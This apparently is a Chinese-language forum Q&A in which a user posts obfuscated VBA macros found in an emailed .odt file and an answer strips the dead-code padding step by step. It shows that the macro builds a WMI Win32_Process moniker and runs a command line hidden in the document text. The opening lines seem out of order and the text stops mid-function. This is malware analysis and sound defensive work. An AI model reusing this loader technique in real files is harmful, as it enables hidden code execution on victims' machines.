' office application, so parent/child rules keyed on the office process alone may
' miss it; WMI process-creation telemetry is the place to look.
ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function
这需要一个存储在名为 T6dwlv_ivpoiq2 的 Word 对象中的混淆命令行(我假设 ThisDocument 已被重命名为那个名字),并通过 Win32_Process::Create 运行它。
大家好,我在通过电子邮件发送的 odt 文件中找到了这个宏(以及其他两个类似的宏)。我知道这很危险,所以我在 linux 发行版的带有 libre office 的虚拟机中打开了它。
' LibreOffice Basic directive: run this module in VBA-compatibility mode so that the
' VBA syntax and library calls used below (e.g. VBA.Replace, CreateObject) are accepted.
Option VBASupport 1
' Obfuscated original of the junk-stripping helper. Only the lines reachable by
' following the GoTo chain ever run (marked "' live" below); every
' Dim / Open / Open / Open / Put / Close stanza between a GoTo and its target label is
' dead code. It would not even work if reached: the same file number is opened three
' times in a row, which raises a run-time error.
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
GoTo GKsgQaAGE
Dim NmmcJMB As String 'POyDeJ
Open "dVMtDJ.ecCLuZ.vNWxUB" For Binary As 154
Open "GmQlB.gLlkBCq.ohnmP" For Binary As 154
Open "asHdBA.RNUGfJo.UEIiMmoM" For Binary As 154
Put #154, , NmmcJMB
Close #154
GKsgQaAGE:
GoTo fIjVkJj
Dim jFUMUmIIJ As String 'NskblDD
Open "fRHrGnFp.uWltAIHCI.WYWvIWr" For Binary As 146
Open "qQeaRICAm.KgqZFRWRC.cuPrnUFxk" For Binary As 146
Open "ShUECDIR.otrtDOGBA.OugaBFHlJ" For Binary As 146
Put #146, , jFUMUmIIJ
Close #146
fIjVkJj:
GoTo hTTQEJEAC
Dim OybSq As String 'kEafA
Open "umMOXxmA.SfYuGDN.ueONFAEFD" For Binary As 227
Open "eIQhLAGS.forvJhMB.LGyFI" For Binary As 227
Open "TifoEDtFB.fukVJAvIS.dlciFGDA" For Binary As 227
Put #227, , OybSq
Close #227
hTTQEJEAC:
' live: HBYVV is always "", so prepending it changes nothing.
HBYVV = ""
' live: removes every "qq)(s2)(" token from the argument. W5ya1q1z48ltq3z_ is never
' assigned anywhere in the listing (an empty Variant), so the replacement text is "".
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
GoTo mJsZBCEFo
Dim jUDsXM As String 'gtpnJOwLd
Open "myDIGCFHC.cgXWyuEFC.OybuGU" For Binary As 131
Open "EnJMG.KCVSIHB.BJiWBGLWG" For Binary As 131
Open "kfSFYoEHi.aXUIAvAP.dswKhikA" For Binary As 131
Put #131, , jUDsXM
Close #131
mJsZBCEFo:
GoTo BOzmWI
Dim CJeaFB As String 'jtrvFEWLD
Open "dfOYHJLF.uBXVkGE.ghpJGB" For Binary As 124
Open "MTfEVUDIQ.DlrvrPEB.PgggwwMD" For Binary As 124
Open "YHUtVQCI.AyvDaAH.JsZULCUu" For Binary As 124
Put #124, , CJeaFB
Close #124
BOzmWI:
GoTo kPMjtUB
Dim eVbTfoFi As String 'xTUBS
Open "eXoWdB.HSupDA.oXRxAS" For Binary As 149
Open "nmuAl.yeRQHDs.UqyoFI" For Binary As 149
Open "nzFmWEVE.ZFvEGsIFD.mjIMGVD" For Binary As 149
Put #149, , eVbTfoFi
Close #149
kPMjtUB:
End Function
' Obfuscated original of the function that does the actual work; see
' S619csvpd1v4xzk5kc for the dead-code pattern. Reachable statements are marked
' "' live". Once the dead code and junk tokens are removed it reads the document text,
' builds the WMI moniker for Win32_Process and runs that text as a command line.
Function Tujor4m47ob()
' live: any run-time error is silently ignored from here on.
On Error Resume Next
' live: reads a story range of the document object (presumably the main text); the
' command line that ends up being executed is stored there, not in the macro.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
GoTo aektCnFI
Dim jaJUkAFeG As String 'cwxgFSS
Open "DbnKMvMAH.jHcdBADv.EGxUCAADs" For Binary As 201
Open "gQEGCB.HVmcrDI.zGpVIUABC" For Binary As 201
Open "shyujG.RFwdH.VPRoIX" For Binary As 201
Put #201, , jaJUkAFeG
Close #201
aektCnFI:
GoTo RtfzGtt
Dim WWCACxG As String 'mRJNaEGtF
Open "vATeCIgJI.FpiaIJIiJ.MmplJ" For Binary As 153
Open "MOIhAmCn.UAJXCE.BwsiJS" For Binary As 153
Open "NpVFCB.MCDxG.UpDmKPxpp" For Binary As 153
Put #153, , WWCACxG
Close #153
RtfzGtt:
GoTo QSISC
Dim qVbhwsATQ As String 'HGHRiZB
Open "xaihM.LJwjAQQQZ.DJoqHIrg" For Binary As 188
Open "HvKRFHh.hsVhH.bZBNF" For Binary As 188
Open "XqxxqFG.ulGKCnC.YQRUOJ" For Binary As 188
Put #188, , qVbhwsATQ
Close #188
QSISC:
' live: this and the next three assignments are fragments of the WMI moniker, each
' padded with the junk token "qq)(s2)(" (decoded in the answer's collapsed version).
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
GoTo nelsfX
Dim MURoCFiFB As String 'XLWzECHi
Open "JvOnPcH.fUHBCGVtD.MqiHAD" For Binary As 133
Open "buFGCCXJ.QSbaYn.wJSsDBFER" For Binary As 133
Open "PBmiWVMA.fEuTBGH.ZgHREKHJC" For Binary As 133
Put #133, , MURoCFiFB
Close #133
nelsfX:
GoTo huGtwmS
Dim taucEJAED As String 'KDSQqD
Open "QlyBbpIG.CHPUEZ.BAQVDHmJ" For Binary As 59
Open "CaxOH.vXPgFHoe.agirIF" For Binary As 59
Open "yzpwxsD.ucWxvGt.QXFsbDn" For Binary As 59
Put #59, , taucEJAED
Close #59
huGtwmS:
GoTo DvDefEl
Dim TfsIR As String 'hnOfJN
Open "exIqDH.MwmVE.YEfbFIJ" For Binary As 176
Open "wMlGriIC.YqLZwG.IfqJAT" For Binary As 176
Open "qSgyRp.VhQHDEA.ggPyFQd" For Binary As 176
Put #176, , TfsIR
Close #176
DvDefEl:
' live
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
GoTo vAZQiJB
Dim xuHzWGDG As String 'RmbpI
Open "ZRfmBGEw.yZYjFMHP.ckDWe" For Binary As 141
Open "gbBrhF.kCOlJnAJ.GLIdD" For Binary As 141
Open "MBUUAw.NbPECAix.UyuHH" For Binary As 141
Put #141, , xuHzWGDG
Close #141
vAZQiJB:
GoTo nmWOSYyF
Dim QPqDJP As String 'HLdYiFJHC
Open "LwmxHCmp.NFrlTBA.VFGtT" For Binary As 149
Open "ofEFEBH.KSyFFWK.TKfABI" For Binary As 149
Open "gyhfb.ipvwBrE.vVquOxU" For Binary As 149
Put #149, , QPqDJP
Close #149
nmWOSYyF:
GoTo tWXiIJDnz
Dim PJjuJ As String 'gmzmA
Open "RkYwxnJEW.rgdTkJfGF.zantCJ" For Binary As 152
Open "yxpQHDBA.zkorIAiHS.StjAKJ" For Binary As 152
Open "nbYwYEWhC.CeOFDlC.VvhoEHt" For Binary As 152
Put #152, , PJjuJ
Close #152
tWXiIJDnz:
' live
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
GoTo SyZjrEHAG
Dim UjcXr As String 'MpbLCImG
Open "WanlBnGn.vOkxHB.FUNtGuCCw" For Binary As 52
Open "krLiFHpF.eVBFvd.JWHZCso" For Binary As 52
Open "umSoGWOGJ.uhkWJDAQ.ACsLFB" For Binary As 52
Put #52, , UjcXr
Close #52
SyZjrEHAG:
GoTo uXAHJydE
Dim HpQEA As String 'THrtIBIAD
Open "rRdnUjHbw.iDplGAz.PjQxp" For Binary As 211
Open "TXrkTGK.FbNkBCE.nGfkHCJj" For Binary As 211
Open "fnehJF.MwLyDGIC.meixAlF" For Binary As 211
Put #211, , HpQEA
Close #211
uXAHJydE:
GoTo PYuemWAC
Dim DiIIF As String 'OPurH
Open "nXywAI.gJpfbBO.HipQCDYJJ" For Binary As 129
Open "SZqPCAC.pZyeTtAF.ORiEHGH" For Binary As 129
Open "OrYPhm.tEuCH.YaWnFsI" For Binary As 129
Put #129, , DiIIF
Close #129
PYuemWAC:
' live: the four named operands are never assigned in the listing, so this is
' ChrW(wdKeyS) — presumably the "s" of "winmgmts" (wdKeyS is a Word WdKey constant).
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
GoTo UxlgEAI
Dim rFHJy As String 'zHXJG
Open "CRkMC.mCwoR.dFnkA" For Binary As 185
Open "jrtAEKE.uIVzu.jqMwAC" For Binary As 185
Open "HJmgHkBC.MyfFGEi.rTJlw" For Binary As 185
Put #185, , rFHJy
Close #185
UxlgEAI:
GoTo vIDVA
Dim GWbqA As String 'UxHBcFQ
Open "YeMqlJ.uCiqCNS.WjgigV" For Binary As 159
Open "DrttFCz.lpfOt.UeCjC" For Binary As 159
Open "AscqIIYrJ.JeGiiSE.mYjmAABJ" For Binary As 159
Put #159, , GWbqA
Close #159
vIDVA:
GoTo lutoTsPkH
Dim nmwGcQ As String 'OTTxPImEN
Open "iVnKJ.YEevQ.GWucCAFI" For Binary As 217
Open "NxgIP.TARFAADew.NyFRA" For Binary As 217
Open "NvrZDA.DdShRHFtD.BErohw" For Binary As 217
Put #217, , nmwGcQ
Close #217
lutoTsPkH:
' live: concatenates the fragments in moniker order.
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
GoTo QdQmIDzTC
Dim akWgAQAIC As String 'rMAWIEja
Open "lHZGGIbGc.iaJoCAFB.VNeICCIax" For Binary As 206
Open "RdpGJIBOF.swjFv.IeAbvID" For Binary As 206
Open "IyaYxC.BTSLmDJ.jgOiOIDGT" For Binary As 206
Put #206, , akWgAQAIC
Close #206
QdQmIDzTC:
GoTo zNPNECkYX
Dim JZcLuFA As String 'VtNiGGmD
Open "FOxJQVBLi.dDrmJG.osuuaBIDb" For Binary As 125
Open "gWUYvHr.ZTgQT.DNujcI" For Binary As 125
Open "BwDJADFsC.LJFNLbb.daiRJD" For Binary As 125
Put #125, , JZcLuFA
Close #125
zNPNECkYX:
GoTo vmJnC
Dim OahWDBD As String 'zMMkH
Open "xINyH.PTxmCYVEI.ZjICHD" For Binary As 167
Open "ywqUjrAcG.nStXYBIsJ.CUmPFEHE" For Binary As 167
Open "gThcAJ.ZKJdpcm.tjPbu" For Binary As 167
Put #167, , OahWDBD
Close #167
vmJnC:
' live: strips the junk tokens, yielding the WMI moniker.
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
GoTo sFyhnDDx
Dim PCRIYp As String 'pMvRFAK
Open "sNdvIH.EwGNvsEC.ALrzVIC" For Binary As 203
Open "sClXGS.DwVOXN.VhyWJEJ" For Binary As 203
Open "UtEKe.Ylfjhi.utxEPXwo" For Binary As 203
Put #203, , PCRIYp
Close #203
sFyhnDDx:
GoTo RKPFYlFb
Dim pRdXtubFT As String 'gfQxcwC
Open "QsQGaIC.AwxeAW.xtrtFCFdF" For Binary As 158
Open "TxVEJ.iXjAEimg.TDSdLDOA" For Binary As 158
Open "ThIgAFZBB.NbVEqpw.YsHvp" For Binary As 158
Put #158, , pRdXtubFT
Close #158
RKPFYlFb:
GoTo vmlpJOA
Dim HUPVnvFAA As String 'WkgKBIH
Open "rxhFoG.AShLFJDl.zybsiV" For Binary As 191
Open "UDZsNIDG.VfdgH.MBiBLq" For Binary As 191
Open "MAIbDAaJ.BfRJzI.vKbPTLCD" For Binary As 191
Put #191, , HUPVnvFAA
Close #191
vmlpJOA:
' live: binds to the WMI Win32_Process class (fails silently where COM/WMI is absent).
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
GoTo PViTAAED
Dim KMChE As String 'tdXnByPb
Open "IJzlC.SoCtG.TPbXhBKrm" For Binary As 94
Open "GAzJGdUeC.SjRAxF.SebwGKPCv" For Binary As 94
Open "BCyTAdFeI.MvwOCAI.YKhJFAApg" For Binary As 94
Put #94, , KMChE
Close #94
PViTAAED:
GoTo RBFRbHBg
Dim DqWYFGG As String 'UDjSMF
Open "AQlXBCb.vtUJfcFG.uXigEO" For Binary As 214
Open "ZDHjAEWl.doArj.lPBxKCC" For Binary As 214
Open "aGQoDDk.VZsZQhDoP.fnRuG" For Binary As 214
Put #214, , DqWYFGG
Close #214
RBFRbHBg:
GoTo SFgGtIlpD
Dim GDZZqGDJ As String 'FpwxECGKS
Open "gMgqJJ.sEwvhb.SuXWmVIA" For Binary As 106
Open "nrzOZDa.ZzIiFFSE.VjWVF" For Binary As 106
Open "vPEJJqH.jFzYA.AlzwaDJBw" For Binary As 106
Put #106, , GDZZqGDJ
Close #106
SFgGtIlpD:
' live: drops the first four characters of the document text (the length argument
' is larger than needed and harmless).
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
GoTo xjadBeU
Dim nmTHypHA As String 'DVUNjGqL
Open "cURDDF.pLPgGlcD.FYnPCELJI" For Binary As 127
Open "HvCbXDBq.RUZaGEzC.bgBsAAd" For Binary As 127
Open "vBsfDkB.xlZBIMF.TDVEEFQJ" For Binary As 127
Put #127, , nmTHypHA
Close #127
xjadBeU:
GoTo wWUQDA
Dim AEazvYO As String 'WmUZOHEM
Open "DMNSECHJb.bbxJxAEDq.LnJxA" For Binary As 55
Open "gFPXD.IEgaqJz.YAHsC" For Binary As 55
Open "lEilB.QvPXD.cMfWCJO" For Binary As 55
Put #55, , AEazvYO
Close #55
wWUQDA:
GoTo xFoIFC
Dim YFLpuEi As String 'WteBl
Open "nfhAABBEB.VeDeFP.sKzKuBBC" For Binary As 203
Open "wXXiJHf.TCBShGYr.DNKsHT" For Binary As 203
Open "mQnnE.bmZQGSEA.AGkxGzCHX" For Binary As 203
Put #203, , YFLpuEi
Close #203
xFoIFC:
GoTo QGPRjInP
Dim WKiiJDVJq As String 'yoOwJD
Open "qyXGFD.Mnoog.UnkFG" For Binary As 109
Open "HKwtB.rBrtHJf.lLgDD" For Binary As 109
Open "AhHYjIBs.vNObEAAJ.IRARxrx" For Binary As 109
Put #109, , WKiiJDVJq
Close #109
QGPRjInP:
GoTo AsvyFHHC
Dim FymJHI As String 'DYLTWEF
Open "sLYJBI.TQZluJA.LgcFP" For Binary As 175
Open "ojxyHHEP.vXfQD.OBTMB" For Binary As 175
Open "AlRZo.MXGVMDVDJ.FRGRQ" For Binary As 175
Put #175, , FymJHI
Close #175
AsvyFHHC:
GoTo iKyOGBLAy
Dim zqgnJAxpy As String 'HZaLGI
Open "aKrxWJUr.NfKHtA.lWiIG" For Binary As 150
Open "byAGVzBQ.OjVafcB.yoXPx" For Binary As 150
Open "fSJtFAEEA.yqTyACLA.PWwsTDwIy" For Binary As 150
Put #150, , zqgnJAxpy
Close #150
iKyOGBLAy:
' live: Win32_Process.Create runs the un-junked document text as a command line;
' Gge416y0ol9ajq and Z2vzndsnblr9xje7s are never assigned (empty arguments).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
GoTo pUmEYEJA
Dim eRlMmLKx As String 'rpaKAI
Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209
Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209
Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209
Put #209, , eRlMmLKx
Close #209
pUmEYEJA:
GoTo CUZigB
Dim rJseFDK As String 'fQYhA
Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207
Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207
Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207
Put #207, , rJseFDK
Close #207
CUZigB:
GoTo XonQB
Dim TOMwIrgJ As String 'pIUaGf
Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189
Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189
Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189
Put #189, , TOMwIrgJ
Close #189
XonQB:
GoTo rKyfgFyfq
Dim cztpFp As String 'YwYKGv
Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138
Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138
Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138
Put #138, , cztpFp
Close #138
rKyfgFyfq:
GoTo kvkwNE
Dim ugNdBHTqJ As String 'HtmXmvT
Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202
Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202
Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202
Put #202, , ugNdBHTqJ
Close #202
kvkwNE:
GoTo UaqRCIH
Dim bgosIAI As String 'hAsNYHIgo
Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134
Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134
Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134
Put #134, , bgosIAI
Close #134
UaqRCIH:
End Function
' Obfuscated original of a thin wrapper: calls S619csvpd1v4xzk5kc on its argument with
' errors suppressed. Same dead-code pattern as above; reachable lines marked "' live".
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
' live
On Error Resume Next
GoTo oheeCHI
Dim iVJGnsW As String 'OEDeu
Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140
Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140
Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140
Put #140, , iVJGnsW
Close #140
oheeCHI:
GoTo yPqfxADJ
Dim qTLRXCv As String 'wvoHE
Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207
Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207
Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207
Put #207, , qTLRXCv
Close #207
yPqfxADJ:
GoTo bRMAl
Dim qpTUMG As String 'FVzXiA
Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210
Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210
Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210
Put #210, , qpTUMG
Close #210
bRMAl:
' live: plain copy of the argument.
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
GoTo TrdMzBDZJ
Dim uhqsGuAB As String 'LyQczqYvJ
Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178
Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178
Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178
Put #178, , uhqsGuAB
Close #178
TrdMzBDZJ:
GoTo loQNDFH
Dim RBLslko As String 'BQaqZjA
Open "uxKEC.pIZoJF.srBaREc" For Binary As 135
Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135
Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135
Put #135, , RBLslko
Close #135
loQNDFH:
GoTo RjWVCNKEI
Dim XUDHDiKId As String 'DfsDD
Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141
Open "QQMFr.jWYtE.SdCsJ" For Binary As 141
Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141
Put #141, , XUDHDiKId
Close #141
RjWVCNKEI:
' live: delegate to the junk-stripping helper.
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
GoTo nMdUMleFB
Dim SLJdkBII As String 'FWRUNdgHJ
Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163
Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163
Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163
Put #163, , SLJdkBII
Close #163
nMdUMleFB:
GoTo mdgvjEeAC
Dim LbhGD As String 'XKxXUoJG
Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192
Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192
Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192
Put #192, , LbhGD
Close #192
mdgvjEeAC:
GoTo ojGsFHEEF
Dim IkDkKCv As String 'KClXGffED
Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106
Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106
Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106
Put #106, , IkDkKCv
Close #106
ojGsFHEEF:
' live
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
GoTo aeMpCH
Dim ClyWRG As String 'mYWbL
Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170
Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170
Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170
Put #170, , ClyWRG
Close #170
aeMpCH:
GoTo BHZQG
Dim HvnISHlCE As String 'ffPuICmH
Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205
Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205
Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205
Put #205, , HvnISHlCE
Close #205
BHZQG:
GoTo vApdD
Dim vuEJPy As String 'OnFFAqHWH
Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167
Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167
Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167
Put #167, , vuEJPy
Close #167
vApdD:
End Function
我如何才能看到它的实际作用?这明明是加密的,但必须有办法解密,否则怎么能在任何机器上执行?
如果您注意,您会发现几乎每个 GoTo
都指向另一个 GoTo
而不是实际代码。您看到的大部分代码根本不会执行。即使执行到,它也会因错误而失败:它试图用同一个文件号接连打开几个不存在的文件,而这是不允许的。
您可以通过 GoTo
链轻松找到真正会执行的行,总共只有十几行。
识别出它们并删除仅存在以混淆反恶意软件的死代码后,您将得到三个相当短的函数:
' S619csvpd1v4xzk5kc with the dead code removed: the only work is a VBA.Replace that
' strips every "qq)(s2)(" junk token from the argument.
' HBYVV is always "" and W5ya1q1z48ltq3z_ is never assigned anywhere in the listing
' (an empty Variant), so the prefix and the replacement text both amount to "".
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
HBYVV = ""
S619csvpd1v4xzk5kc = HBYVV + VBA.Replace _
(Xoyqcbzwjyi6tqiw0z, "qq" + ")(s2)" + "(", W5ya1q1z48ltq3z_)
End Function
' Tujor4m47ob with the dead code removed. This is the function that does the work:
' it reads the document text, assembles a WMI moniker from junk-padded fragments and
' runs the (un-junked) document text as a command line through Win32_Process.Create.
' On Error Resume Next hides every failure, so where COM/WMI is unavailable (e.g.
' LibreOffice on Linux) the macro simply does nothing visible.
Function Tujor4m47ob()
On Error Resume Next
' Story range of the document object (presumably the main text). The command line
' lives in the document body, not in the macro.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
' Moniker fragments, each padded with the junk token "qq)(s2)(" (see the collapsed
' version below for the folded literals).
sng2 = "qq)(" + "s2)(pq" + _
"q)(s2)("
F7_if4svnte = "qq)(s" + _
"2)(roqq" + ")(s2)(qq)(s2)(ceqq)(s2)" + _
"(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(" + ":wqq)(s2)(qq)(s" + _
"2)(inqq)(s2)(3qq)(s" + _
"2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2" + _
")(inqq)(s2)(mqq)(s" + "2)(gmqq)(s2)(tqq)(" + "s2)(qq)(s2)("
' Kfo_8qx2w7l7x71, Hvsf68urunanusc, A08llnuiz59xyw7 and Pgjdd1yrw8qt are never
' assigned, so this is ChrW(wdKeyS) — presumably the "s" of "winmgmts".
Kz1yuitvz3qu6xai = Kfo_8qx2w7l7x71 + ChrW(Hvsf68urunanusc + wdKeyS + A08llnuiz59xyw7) + Pgjdd1yrw8qt
' Fragments in moniker order, then the junk tokens are stripped.
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
' WMI Win32_Process class object.
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
' Drops the first four characters of the document text (length argument is oversized
' but harmless).
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
' Win32_Process.Create on the un-junked text; the last two arguments are never
' assigned (empty).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
' C0d4mc619_eaiuirzl with the dead code removed: a pass-through to
' S619csvpd1v4xzk5kc under On Error Resume Next (so a failure inside the helper
' leaves the result Empty instead of raising). The intermediate copies add nothing.
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
如果您随后将字符串文字折叠成一个并删除已知始终为空的虚假变量,您将得到:
' Same helper with the string literals folded: remove every "qq)(s2)(" junk token.
' The always-empty HBYVV and the never-assigned W5ya1q1z48ltq3z_ have been dropped.
Function S619csvpd1v4xzk5kc(Xoyqcbzwjyi6tqiw0z)
S619csvpd1v4xzk5kc = VBA.Replace(Xoyqcbzwjyi6tqiw0z, "qq)(s2)(", "")
End Function
' Tujor4m47ob with literals folded and the always-empty variables removed.
' Stripping the junk token "qq)(s2)(" from the four fragments gives, in concatenation
' order: "winmgmt" + ChrW(wdKeyS) + ":win32_" + "p" + "rocess", i.e. the WMI moniker
' "winmgmts:win32_process" (wdKeyS presumably being the key code for "S").
Function Tujor4m47ob()
On Error Resume Next
' Document text; the command line is stored there, after a 4-character prefix.
sh2v = T6dwlv_ivpoiq2.StoryRanges.Item(1)
sng2 = "qq)(s2)(pqq)(s2)("
F7_if4svnte = "qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)("
Vbzhqcqh1pqco1e2_ = "qq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)("
R67uawfvzvw = "wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)("
Kz1yuitvz3qu6xai = ChrW(wdKeyS)
Ni1wsg2ja20x23qpzl = R67uawfvzvw + Kz1yuitvz3qu6xai + Vbzhqcqh1pqco1e2_ + sng2 + F7_if4svnte
Kltqgnwd4i8 = C0d4mc619_eaiuirzl(Ni1wsg2ja20x23qpzl)
' WMI Win32_Process class object; fails silently where COM/WMI is unavailable.
Set Bx9ystsny9ej4ynfne = CreateObject(Kltqgnwd4i8)
Wb0zemdl5ow9 = Mid(sh2v, (5), Len(sh2v))
' Runs the un-junked document text as a command line; the two trailing arguments
' are never assigned (empty).
Bx9ystsny9ej4ynfne.Create C0d4mc619_eaiuirzl(Wb0zemdl5ow9), Gge416y0ol9ajq, Z2vzndsnblr9xje7s
End Function
' Unchanged from the previous step: an error-suppressing pass-through to
' S619csvpd1v4xzk5kc. Nothing here depends on the folded literals.
Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
On Error Resume Next
H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
End Function
现在您或许可以为这些函数指定适当的名称,并将混淆后的字符串替换为对它们进行去混淆后的结果:
' Strips every occurrence of the junk token "qq)(s2)(" that the macro sprinkles through
' its strings. Pure string helper, no side effects.
'   input_string: junk-padded text
'   returns:      input_string with all "qq)(s2)(" tokens removed
Function RemoveBogusQqFromString(input_string)
    Dim junkToken As String
    Dim cleaned As String
    junkToken = "qq)(s2)("
    cleaned = VBA.Replace(input_string, junkToken, "")
    RemoveBogusQqFromString = cleaned
End Function
' Error-suppressing front for RemoveBogusQqFromString (the original
' C0d4mc619_eaiuirzl). With On Error Resume Next a failure inside the helper leaves
' the result Empty instead of raising.
'   input_string: junk-padded text
'   returns:      the helper's result, or Empty if the helper failed
Function WrapperForRemoveBogusQqFromString(input_string)
    On Error Resume Next
    Dim cleaned
    cleaned = RemoveBogusQqFromString(input_string)
    WrapperForRemoveBogusQqFromString = cleaned
End Function
' The macro's entry point in readable form. It carries no payload of its own: the
' command line is read from the document text and merely un-junked here, so extracting
' the document body (minus its 4-character prefix) recovers what would be executed
' without running the macro.
Function StartProcess()
On Error Resume Next
' Story range of the document object (ThisDocument, presumably renamed).
ObfuscatedCommandLineWithPrefix = T6dwlv_ivpoiq2.StoryRanges.Item(1)
' WMI moniker for the Win32_Process class (assembled from fragments in the original).
' Where COM/WMI is unavailable (e.g. LibreOffice on Linux) this fails and, because of
' On Error Resume Next, the rest of the function silently does nothing.
